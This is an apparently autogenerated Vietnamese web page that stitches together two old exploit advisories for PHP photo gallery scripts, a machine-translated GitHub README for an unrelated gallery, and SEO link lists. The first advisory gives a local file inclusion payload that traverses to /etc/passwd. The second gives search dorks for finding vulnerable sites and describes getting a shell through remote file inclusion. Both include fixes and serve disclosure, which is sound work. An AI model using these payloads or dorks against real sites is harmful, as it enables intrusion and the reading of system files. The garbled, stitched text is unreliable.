search

Hướng dẫn simple php photo gallery v0.8 exploit github - thư viện ảnh php đơn giản v0.8 khai thác github

Ngày đăng: 04/11/2022
Trả lời: 0
Lượt xem: 140 

[START]

###################################################################################################################################
[0x01] Informations:

Script         : Php Photo Album 0.8 BETA
Download       : http://sourceforge.net/project/downloading.php?group_id=151573&use_mirror=kent&filename=PHPPA_.9_BETA.zip&37834145
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian


###################################################################################################################################
[0x02] Bug: [Local File Inclusion]
######

Bugged file is: /[path]/index.php

[CODE]

$skin_temp = $_GET['preview'];
if(isset($_GET['preview']) && file_exists("./skin/$skin_temp/config.php")){
	$skin = $_GET['preview'];
	}
else{
	$skin = vari("skin");
	}
require("./skin/$skin/config.php");

[/CODE]

If 'preview' from GET is provided, we can include it just bypassing a stupid cheek.
file_exists("./skin/$skin_temp/config.php) <-- this cheek is stupid, becouse when
we set a value to $skin_temp , if we set a local file with a directory trasversal
it's obvious that the file exists, so it will be included.

[!] FIX: Use another filter instead of file_exists("./skin/$skin_temp/config.php)
         Just filter $skin_temp before include it. A fix could be to declare $skin
         with a standard or local value, or just put the allowed values in an array,
         and cheek then if the skin provided is allowed. See is_in_array() function


[!] EXPLOIT: /[path]/index.php?preview=[local_file]%00
                                       ../../../../../../../../../../../../etc/passwd%00

###################################################################################################################################

[/END]

# milw0rm.com [2009-01-14]

Show

# Title: SimplePHPGal 0.7 - Remote File Inclusion 
# Author: h4shur
# date:2020-05-05
# Vendor Homepage: https://johncaruso.ca
# Software Link: https://johncaruso.ca/phpGallery/
# Software Link: https://sourceforge.net/projects/simplephpgal/
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Created with Simple PHP Photo Gallery"
         intext:"Created by John Caruso"


### Note:

* Another web application bug is the RFI bug, which can be very dangerous
And stands for Remote File Inclusion, which directly executes loose scripts on the server
Also, this security hole is created by programmer errors
And you must be fluent in programming language to secure and prevent this bug
And you have to control the inputs of the application and use powerful firewalls

* This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script
In fact, by running Shell script, it will have relatively complete access to the Target site server
If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site.

* what's the solution ?
Check the file entered by the user from a list and enter it if the file was in the list. Example :

* If you are a server administrator, turn off allow_url_fopen from the file.

* Or do it with the ini_set command. Only for (RFI)


* We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI)


* Using str_replace we can give the given address from two characters "/", "." Let's clean up.



### Poc  :  

[+]   site.com/image.php?img= [ PAYLOAD ]

Tên đã được sử dụng

Một thẻ đã tồn tại với tên chi nhánh được cung cấp. Nhiều lệnh GIT chấp nhận cả tên thẻ và tên chi nhánh, vì vậy việc tạo nhánh này có thể gây ra hành vi bất ngờ. Bạn có chắc là bạn muốn tạo chi nhánh này?

1branch0tags branch 0 tags

Mã số

  • Sử dụng Git hoặc thanh toán với SVN bằng URL Web.

  • Mở bằng máy tính để bàn GitHub
  • Tải xuống Zip

Cam kết mới nhất

Các tập tin

Permalink

Không tải thông tin cam kết mới nhất.

Loại hình

Tên

Tin nhắn cam kết mới nhất

Cam kết thời gian

Thư viện ảnh PHP đơn giản

Thư viện ảnh PHP đơn giản - PHP, jQuery, Ajax Photo Thư viện không có cơ sở dữ liệu

Dựa trên foliogallery. Đó là một bộ sưu tập đơn giản và nhẹ không yêu cầu cơ sở dữ liệu để chạy.

  • Miễn phí cho sử dụng cá nhân và thương mại.
  • Hiển thị nhiều album và/hoặc bộ sưu tập đầy đủ trong một trang.
  • Giao diện đáp ứng.
  • Tự động tạo hình thu nhỏ.
  • Xuất hiện tùy chỉnh thông qua CSS.

Sự khác biệt so với phiên bản gốc:

  • Đã thêm hỗ trợ cho các thư mục con.
  • Hình ảnh tự động dựa trên thông tin EXIF.
  • Hình ảnh thay đổi kích thước bay. Bạn có thể sử dụng kho lưu trữ ảnh gốc của bạn mà không cần đặt trước nó để xem web.
  • Tải trang tốc độ cho bộ sưu tập hình ảnh lớn.
  • Di chuyển ngón tay cái sang một thư mục riêng. Bộ sưu tập không yêu cầu quyền viết cho các thư mục album.
  • Sử dụng thư viện Php-Magician Php cho việc tạo ngón tay cái và hình ảnh khi thay đổi kích thước bay.

Yêu cầu

  • Một máy chủ chạy PHP 5+.
  • Thư viện PHP GD (để tạo hình thu nhỏ tự động và thay đổi kích thước hình ảnh bay).

Cấu hình

  • Cập nhật $ MainFolder với thư mục cho album ảnh của bạn.$mainFolder with the folder for your photo albums.
  • Cập nhật $ ngón tay cái với thư mục cho ngón tay cái. Thư mục nên có quyền ghi cho người dùng máy chủ web của bạn (thường là www-data).$thumbFolder with the folder for thumbs. The folder should have write permissions for your webserver user (usually www-data).

Trong folio-gallery.php:

$mainFolder    = 'albums';   // folder where your albums are located - relative to root
$thumbsFolder  = 'thumbs';   // folder where your thumbs are located - relative to root

programming php SimplePHPGal 0.8 exploit Php shell GitHub Snookums walkthrough PHP RFI Php cmd shell

Bài Viết Liên Quan

Bài tập toán lớp 4 tập 2 trang 42 năm 2024
Bài tập toán lớp 4 tập 2 trang 42 năm 2024

mẹo hay Khỏe Đẹp Bài tập
Tổng quát văn học việt nam lớp 10 năm 2024
Tổng quát văn học việt nam lớp 10 năm 2024

mẹo hay Học Tốt Học
Bản mã đánh kiêu chữ vntimes new roman là gì năm 2024
Bản mã đánh kiêu chữ vntimes new roman là gì năm 2024

là ai Hỏi Đáp Là gì Bảng mã Unicode Unicode la gì Bảng mã ASCII Telex la gì
Bai văn viết về quê hương miền trung năm 2024
Bai văn viết về quê hương miền trung năm 2024

mẹo hay
Giải vở bài tập toán lớp 2 tập 1 vietjack năm 2024
Giải vở bài tập toán lớp 2 tập 1 vietjack năm 2024

mẹo hay Khỏe Đẹp Bài tập
Dịch vụ thương mại hàng không là làm gì năm 2024
Dịch vụ thương mại hàng không là làm gì năm 2024

là ai Ngôn ngữ Dịch
Các văn bản kế hoạch thực hiện kết luận 62 năm 2024
Các văn bản kế hoạch thực hiện kết luận 62 năm 2024

mẹo hay
Các kỹ thuật mã hóa trong sql server năm 2024
Các kỹ thuật mã hóa trong sql server năm 2024

mẹo hay
Ngựa vằn trong tiếng anh là gì năm 2024
Ngựa vằn trong tiếng anh là gì năm 2024

là ai Hỏi Đáp Là gì Học Tốt Tiếng anh
Muốn thay đổi địa chỉ văn phòng đại diện năm 2024
Muốn thay đổi địa chỉ văn phòng đại diện năm 2024

mẹo hay
Các gốc hóa học hữu cơ 11 violet năm 2024
Các gốc hóa học hữu cơ 11 violet năm 2024

mẹo hay Học Tốt Học
Xe 1 cầu và 2 cầu là gì năm 2024
Xe 1 cầu và 2 cầu là gì năm 2024

là ai Hỏi Đáp Là gì
Bafit tập phương pháp quy nạp toán học sgk năm 2024
Bafit tập phương pháp quy nạp toán học sgk năm 2024

mẹo hay Học Tốt Học Phương pháp
Letter pres còn có tên gọi khác là gì năm 2024
Letter pres còn có tên gọi khác là gì năm 2024

là ai Hỏi Đáp Là gì Letterpress là gì Máy in letterpress
Top 10 thành phố lớn nhất việt nam năm 2024
Top 10 thành phố lớn nhất việt nam năm 2024

mẹo hay Top List Top
Scroll to top not working inside iframe ipad năm 2024
Scroll to top not working inside iframe ipad năm 2024

mẹo hay Top List Top Công Nghệ Ipad webkit-overflow-scrolling
Giặt thảm văn phòng giá rẻ đà nẵng năm 2024
Giặt thảm văn phòng giá rẻ đà nẵng năm 2024

mẹo hay Cryto Giá Mua Sắm Giá rẻ
Sách toán nâng cao lớp 6 nên mua năm 2024
Sách toán nâng cao lớp 6 nên mua năm 2024

mẹo hay Học Tốt Sách
Bất cập trong xã hội hóa giáo dục năm 2024
Bất cập trong xã hội hóa giáo dục năm 2024

mẹo hay
Nghĩa vụ cơ bản của hợp đồng là gì năm 2024
Nghĩa vụ cơ bản của hợp đồng là gì năm 2024

là ai Hỏi Đáp Là gì

Quảng Cáo

Có thể bạn quan tâm

Người sinh năm 1992 hợp với tuổi nào năm 2024
1 ngày trước . bởi RancidBanjo
Rom fix lỗi s4 e300s site tinhte.vn năm 2024
1 ngày trước . bởi OutmodedDrumming
Hết sốt bé nổi ban ngứa là bệnh gì năm 2024
1 ngày trước . bởi InstrumentalEquation
Top game mo phong lai may bay hay pc năm 2024
1 ngày trước . bởi CautionaryKingdom
Chữ năng giao tiếp phi ngôn ngữ là gì năm 2024
1 ngày trước . bởi PreliminaryMatron
503 5 24 phạm văn bạch quận tân bình năm 2024
1 ngày trước . bởi NaggingFlora
Đề kiểm tra học kì 1 môn toán 5 năm 2024
1 ngày trước . bởi GrindingSelf-respect
Top 10 bộ phim kinh dị cấm chiếu năm 2024
1 ngày trước . bởi CrumpledSinking
Mã số thuế hộ kinh doanh là gì năm 2024
1 ngày trước . bởi PlaintiveManifesto
Hiện tượng tán sắc trong sợi quang là gì năm 2024
1 ngày trước . bởi MotionlessPostponement

Toplist được quan tâm

#1
Top 9 tập bản đồ lớp 8 bài 31 2023
5 tháng trước
#2
Top 6 kết quả thi hsg đà nẵng 2022 2023
5 tháng trước
#3
Top 9 tủ nhựa đài loan 4 cánh 3d 2023
5 tháng trước
#4
Top 9 chất khí có thể làm mất màu dung dịch nước brom là: a. so2. b. co2. c. o2. d. hcl. 2023
5 tháng trước
#5
Top 8 tìm việc làm tiện, phay bảo q7 2023
5 tháng trước
#6
Top 3 tôi xuyên thành tiểu kiều the của lão đại phản 2 2023
5 tháng trước
#7
Top 9 đổi mới phong cách, thái độ phục vụ của cán bộ y tế hướng tới sự hài lòng của người bệnh 2023
5 tháng trước
#8
Top 2 bài the dục phát triển chung lớp 6 2022 2023
5 tháng trước
#9
Top 3 bài giảng vũ điệu sắc màu (lớp 4) 2023
5 tháng trước

Quảng cáo

Xem Nhiều

Qua tiêu hóa lipid sẽ được biến đổi thành gì năm 2024
4 ngày trước . bởi RabidContentment
Bài 42 vật lí 9 sách bài tập năm 2024
6 ngày trước . bởi One-manReceptor
Nhà hàng phố đêm 346 phạm văn đồng năm 2024
1 tuần trước . bởi UnregulatedIntersection
Dùng ram như thế nào cho máy tính xem phim năm 2024
1 ngày trước . bởi DelightedWhereabouts
Camera điều khiển tren không gọi là gì năm 2024
1 ngày trước . bởi SquareBrunt
Ký hiệu ext trên tay cầm ps4 pro là gì năm 2024
7 giờ trước . bởi OverhangingIceberg
D là ký hiệu gì trong hóa học năm 2024
1 tuần trước . bởi PreposterousTheology
Nghĩa vụ cơ bản của hợp đồng là gì năm 2024
5 giờ trước . bởi Short-termGrandeur
Rd trong tiếng anh là gì năm 2024
1 tuần trước . bởi EffortlessGoogle
Đi vệ sinh nhiều lần trong ngày là bệnh gì năm 2024
1 tuần trước . bởi AptPerusal

Quảng cáo

Chúng tôi

Điều khoản

Trợ giúp

Mạng xã hội

DMCA.com Protection Status
Bản quyền © 2021 Xây Nhà Inc.